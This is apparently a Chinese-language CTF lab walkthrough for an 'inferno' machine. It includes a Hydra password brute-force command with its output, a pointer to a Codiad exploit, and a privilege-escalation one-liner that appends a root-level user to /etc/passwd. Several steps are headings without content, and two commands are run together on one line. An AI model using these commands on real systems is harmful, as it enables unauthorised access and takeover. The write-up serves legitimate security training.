靶场概述
难度: medium 描述:现实生活中的机器 + CTF。该机器被设计为现实生活(也许不是?),非常适合刚开始渗透测试的新手
基本信息
| 🚀 | 本地机器信息 | 目标机器信息 |
|---|---|---|
| IP | 10.17.5.121 | 10.10.232.226 |
| OS | kali | linux |
信息搜集
端口扫描
需要登录凭证
┌──(leo㉿HACK)-[~/SecLab/inferno]
└─$ hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.232.226 http-
get /inferno
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-12-01 15:01:44
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking http-get://10.10.232.226:80/inferno
[STATUS] 1341.00 tries/min, 1341 tries in 00:01h, 14343057 to do in 178:16h, 16 active
[STATUS] 1410.00 tries/min, 4230 tries in 00:03h, 14340168 to do in 169:31h, 16 active
攻击向量
searchsploit codiad漏洞利用
您会注意到有一个 cronjob 每分钟都会让您注销,因此您必须快点。
获取到密钥
尝试ssh登录
让我们利用这一点来生成一个特权用户:
提权
openssl passwd -1 -salt "test" "test"echo 'test:$1$test$pi/xDtU5WFVRqYS6BMU8X/:0:0:root:/root:/bin/bash' | sudo tee -a /etc/passwd